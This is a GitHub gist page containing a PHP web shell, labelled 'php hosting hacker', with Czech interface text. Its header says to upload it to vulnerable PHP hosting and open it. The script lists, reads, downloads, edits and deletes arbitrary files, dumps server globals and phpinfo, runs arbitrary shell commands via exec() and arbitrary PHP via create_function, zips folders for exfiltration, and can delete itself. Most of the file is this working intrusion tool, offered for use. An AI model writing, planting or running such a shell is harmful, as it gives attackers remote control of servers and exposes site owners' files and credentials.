Created
February 4, 2012 13:02
-
-
Save juzna/1737722 to your computer and use it in GitHub Desktop.
php hosting hacker
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Simple file manager and hosting hacker | |
| * Upload to a vulnerable PHP hosting and open :) | |
| */ | |
| $self = basename($_SERVER['PHP_SELF']); | |
| $akce = @$_GET['akce']; | |
| $path = @$_GET['path']; | |
| if(empty($path)) $path = '.'; | |
| $no_pre = array('download'); | |
| if(array_search($akce,$no_pre)===FALSE) echo('<pre>'); | |
| switch($akce) { | |
| case 'list': | |
| case '': | |
| if(substr($path,-1)!= '/') $path .= '/'; | |
| $path = stripslashes($path); | |
| chdir($path); | |
| $cwd = str_replace('\\','/',getcwd()); | |
| echo("<h2>Adresar '"); | |
| $cwd = explode('/', $cwd); | |
| $pt = ''; | |
| foreach($cwd as $cw) { | |
| $pt.=$cw.'/'; | |
| echo("<a href=\"$self?akce=list&path=$pt\">$cw</a>/"); | |
| } | |
| echo("' ('$path')</h2>\n<h3>Slozky</h3>"); | |
| if(function_exists('scandir')) $dir = scandir('.'); | |
| else { | |
| unset($dir); | |
| $h = opendir('.'); | |
| while($dr = readdir($h)) $dir[] = $dr; | |
| sort($dir); | |
| } | |
| foreach($dir as $fld) { | |
| if(!is_dir($fld)) continue; | |
| $per = decoct(fileperms($fld)); | |
| printf("<a href=\"$self?akce=list&path=$path$fld\">%-45s%7s <a href=\"#\" onclick=\"if(confirm('RU Sure?')) window.navigate('$self?akce=unlink&path=$path$fld');\">Smazat</a>\n",$fld.'</a>',$per); | |
| } | |
| echo("\n<h3>Soubory</h3>"); | |
| foreach($dir as $fld) { | |
| if(!is_file($fld)) continue; | |
| $per = decoct(fileperms($fld)); | |
| $sz = number_format(filesize($fld),0,'',' '); | |
| printf("<a href=\"$self?akce=show&path=$path$fld\">%-30s%12s %7s <a href=\"#\" onclick=\"if(confirm('RU Sure?')) window.navigate('$self?akce=unlink&path=$path$fld');\">Smazat</a> <a href=\"$self?akce=download&path=$path$fld\">Stahnout</a>\n",$fld.'</a>',$sz,$per); | |
| } | |
| break; | |
| case 'show': | |
| if(!file_exists($path)) return 'Soubor NEEXISTUJE'; | |
| echo("<h2>Soubor '$path'</h2><hr>\n\n"); | |
| $fp = fopen($path,'r'); | |
| while($dat = fread($fp,1024)) echo(htmlspecialchars($dat)); | |
| fclose($fp); | |
| break; | |
| case 'download': | |
| if(!file_exists($path)) return 'Soubor NEEXISTUJE'; | |
| header("Pragma: no-cache"); | |
| $file = basename($path); | |
| header("Content-Type: text/x-delimtext; name=\"$file\""); | |
| header("Content-disposition: attachment; filename=$file"); | |
| $fp = fopen($path,'r'); | |
| while($dat = fread($fp,1024)) { | |
| @set_time_limit(10); | |
| echo($dat); | |
| flush(); | |
| ob_flush(); | |
| } | |
| fclose($fp); | |
| exit(); | |
| case 'unlink': | |
| $x = unlink($path); | |
| echo($x ? 'Smazano' : '<h1>Nastala chyba</h1>'); | |
| break; | |
| case 'fcelist': | |
| print_r(get_defined_functions()); | |
| break; | |
| case 'edit': | |
| if(!file_exists($path)) return 'Soubor NEEXISTUJE'; | |
| echo("<h2>Soubor '$path'</h2><hr>\n\n"); | |
| $dat = file_get_contents($path); | |
| echo("<form method=\"post\" action=\"$self?akce=save&path=$path\"><textarea name=\"editovano\">"); | |
| echo(htmlspecialchars($dat)); | |
| echo('</textarea><br /><input type="submit" value="Ulozit"></form>'); | |
| break; | |
| case 'save': | |
| @unlink($path); | |
| $x = file_put_contents($path,$_POST['editovano']); | |
| echo($x ? 'Ulozeno' : '<h1>Nastala chyba</h1>'); | |
| break; | |
| case 'kamikaze': | |
| $x = unlink($self); | |
| echo($x ? 'Smazano' : '<h1>Nastala chyba</h1>'); | |
| break; | |
| case 'zip': | |
| $z = new PHPZip(); | |
| $z ->Zip($path, "$self.zip"); | |
| $size = number_format(filesize("$self.zip"),0,'',' '); | |
| echo("<a href=\"$self.zip\">Stahnout</a> ($size B), <a href=\"$self?akce=unlink&path=./$self.zip\">Smazat</a>"); | |
| break; | |
| case 'globals': | |
| print_r($GLOBALS); | |
| break; | |
| case 'phpinfo': | |
| phpinfo(); | |
| break; | |
| case 'exec': | |
| chdir($path); | |
| $data = @$_POST['data']; | |
| $data = stripslashes($data); | |
| echo("Zadany prikaz:\n<table border=1 width=800><tr><td>$data</td></tr></table></hr>"); | |
| exec($data, $ret); | |
| echo(implode("\n",$ret)); | |
| break; | |
| case 'phpfce': | |
| echo('<h2>PHP Funkce</h2><hr>'); | |
| chdir($path); | |
| $data = @$_POST['data1']; | |
| $data = stripslashes($data); | |
| $fce = @create_function('',$data); | |
| $ret = $fce(); | |
| echo($ret); | |
| break; | |
| } | |
| ?> | |
| </pre> | |
| <hr> | |
| <a href="<?php echo($self); ?>">HOME</a>, | |
| <a href="<?php echo("$self?akce=list&path=$path"); ?>">Zobrazit slozku</a>, | |
| <a href="<?php echo($self); ?>?akce=kamikaze">Kamikaze</a>, | |
| <a href="<?php echo("$self?akce=zip&path=$path/"); ?>">ZIPnout tuto slozku</a>, | |
| <a href="<?php echo($self); ?>?akce=globals">Vsechny promenne</a>, | |
| <a href="<?php echo($self); ?>?akce=phpinfo">PHPinfo</a> | |
| <form method="post" action="<?php echo("$self?akce=exec&path=$path"); ?>"> | |
| Execute:<textarea name="data" rows="2" cols="50"><?php echo(@$_POST['data']); ?></textarea><input type="submit"> | |
| </form> | |
| <form method="post" action="<?php echo("$self?akce=phpfce&path=$path"); ?>"> | |
| PHP funkce:<textarea name="data1" rows="5" cols="50"><?php echo(@$_POST['data1']); ?></textarea><input type="submit"> | |
| </form> | |
| <?php | |
| /* ----------------------------------------------------------------------------- | |
| ----------------------------------------------------------------------------- | |
| TAK TADY BUDOU RUZNY TRIDY ATD SE KTERYMA FILATOR PRACUJE | |
| ----------------------------------------------------------------------------- | |
| ----------------------------------------------------------------------------- | |
| */ | |
| class PHPZip | |
| { | |
| function Zip($dir, $zipfilename) | |
| { | |
| if (@function_exists('gzcompress')) | |
| { | |
| if (is_array($dir)) | |
| { | |
| $filelist = $dir; | |
| } | |
| else | |
| { | |
| $filelist = $this -> GetFileList($dir); | |
| } | |
| if (count($filelist)>0) | |
| { | |
| $this->fp = fopen($zipfilename, "w"); | |
| foreach($filelist as $filename) | |
| { | |
| if (is_file($filename)) | |
| { | |
| $fd = fopen ($filename, "r"); | |
| $content = filesize($filename) ? fread ($fd, filesize ($filename)) : ''; | |
| fclose ($fd); | |
| $filename = substr($filename,strlen($dir)); | |
| echo("Pridavam soubor $filename<br />"); | |
| $this -> addFile($content, $filename); | |
| } | |
| } | |
| $this->file(); | |
| fclose($this->fp); | |
| } | |
| return 1; | |
| } | |
| else return 0; | |
| } | |
| function GetFileList($dir) | |
| { | |
| $file = array(); | |
| if (file_exists($dir)) | |
| { | |
| $dh = opendir($dir); | |
| while($files = readdir($dh)) | |
| { | |
| if (($files!=".")&&($files!="..")) | |
| { | |
| if (is_dir($dir.$files)) | |
| { | |
| $file = array_merge($file, $this -> GetFileList("$dir$files/")); | |
| } | |
| else $file[]=$dir.$files; | |
| } | |
| } | |
| closedir($dh); | |
| } | |
| return $file; | |
| } | |
| var $datasec = array(); | |
| var $datalen = 0; | |
| var $ctrl_dir = array(); | |
| var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; | |
| var $old_offset = 0; | |
| var $fp; | |
| /** | |
| * Converts an Unix timestamp to a four byte DOS date and time format (date | |
| * in high two bytes, time in low two bytes allowing magnitude comparison). | |
| * | |
| * @param integer the current Unix timestamp | |
| * | |
| * @return integer the current date in a four byte DOS format | |
| * | |
| * @access private | |
| */ | |
| function unix2DosTime($unixtime = 0) { | |
| $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); | |
| if ($timearray['year'] < 1980) { | |
| $timearray['year'] = 1980; | |
| $timearray['mon'] = 1; | |
| $timearray['mday'] = 1; | |
| $timearray['hours'] = 0; | |
| $timearray['minutes'] = 0; | |
| $timearray['seconds'] = 0; | |
| } // end if | |
| return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | | |
| ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); | |
| } // end of the 'unix2DosTime()' method | |
| /** | |
| * Adds "file" to archive | |
| * | |
| * @param string file contents | |
| * @param string name of the file in the archive (may contains the path) | |
| * @param integer the current timestamp | |
| * | |
| * @access public | |
| */ | |
| function addFile($data, $name, $time = 0) | |
| { | |
| $name = str_replace('\\', '/', $name); | |
| $dtime = dechex($this->unix2DosTime($time)); | |
| $hexdtime = '\x' . $dtime[6] . $dtime[7] | |
| . '\x' . $dtime[4] . $dtime[5] | |
| . '\x' . $dtime[2] . $dtime[3] | |
| . '\x' . $dtime[0] . $dtime[1]; | |
| eval('$hexdtime = "' . $hexdtime . '";'); | |
| $fr = "\x50\x4b\x03\x04"; | |
| $fr .= "\x14\x00"; // ver needed to extract | |
| $fr .= "\x00\x00"; // gen purpose bit flag | |
| $fr .= "\x08\x00"; // compression method | |
| $fr .= $hexdtime; // last mod time and date | |
| // "local file header" segment | |
| $unc_len = strlen($data); | |
| $crc = crc32($data); | |
| $zdata = gzcompress($data); | |
| $c_len = strlen($zdata); | |
| $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); // fix crc bug | |
| $fr .= pack('V', $crc); // crc32 | |
| $fr .= pack('V', $c_len); // compressed filesize | |
| $fr .= pack('V', $unc_len); // uncompressed filesize | |
| $fr .= pack('v', strlen($name)); // length of filename | |
| $fr .= pack('v', 0); // extra field length | |
| $fr .= $name; | |
| // "file data" segment | |
| $fr .= $zdata; | |
| // "data descriptor" segment (optional but necessary if archive is not | |
| // served as file) | |
| $fr .= pack('V', $crc); // crc32 | |
| $fr .= pack('V', $c_len); // compressed filesize | |
| $fr .= pack('V', $unc_len); // uncompressed filesize | |
| // add this entry to array | |
| fwrite($this->fp, $fr, strlen($fr)); | |
| $this->datalen += strlen($fr); | |
| // $this -> datasec[] = $fr; | |
| $new_offset = $this->datalen; | |
| // now add to central directory record | |
| $cdrec = "\x50\x4b\x01\x02"; | |
| $cdrec .= "\x00\x00"; // version made by | |
| $cdrec .= "\x14\x00"; // version needed to extract | |
| $cdrec .= "\x00\x00"; // gen purpose bit flag | |
| $cdrec .= "\x08\x00"; // compression method | |
| $cdrec .= $hexdtime; // last mod time & date | |
| $cdrec .= pack('V', $crc); // crc32 | |
| $cdrec .= pack('V', $c_len); // compressed filesize | |
| $cdrec .= pack('V', $unc_len); // uncompressed filesize | |
| $cdrec .= pack('v', strlen($name) ); // length of filename | |
| $cdrec .= pack('v', 0 ); // extra field length | |
| $cdrec .= pack('v', 0 ); // file comment length | |
| $cdrec .= pack('v', 0 ); // disk number start | |
| $cdrec .= pack('v', 0 ); // internal file attributes | |
| $cdrec .= pack('V', 32 ); // external file attributes - 'archive' bit set | |
| $cdrec .= pack('V', $this -> old_offset ); // relative offset of local header | |
| $this -> old_offset = $new_offset; | |
| $cdrec .= $name; | |
| // optional extra field, file comment goes here | |
| // save to central directory | |
| $this -> ctrl_dir[] = $cdrec; | |
| } // end of the 'addFile()' method | |
| /** | |
| * Dumps out file | |
| * | |
| * @return string the zipped file | |
| * | |
| * @access public | |
| */ | |
| function file() | |
| { | |
| // $data = implode('', $this -> datasec); | |
| $ctrldir = implode('', $this -> ctrl_dir); | |
| $wrt = | |
| // $data . | |
| $ctrldir . | |
| $this -> eof_ctrl_dir . | |
| pack('v', sizeof($this -> ctrl_dir)) . // total # of entries "on this disk" | |
| pack('v', sizeof($this -> ctrl_dir)) . // total # of entries overall | |
| pack('V', strlen($ctrldir)) . // size of central dir | |
| pack('V', $this->datalen) . // offset to start of central dir | |
| "\x00\x00"; // .zip file comment length | |
| fwrite($this->fp, $wrt, strlen($wrt)); | |
| } // end of the 'file()' method | |
| } // end of the 'PHPZip' class |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment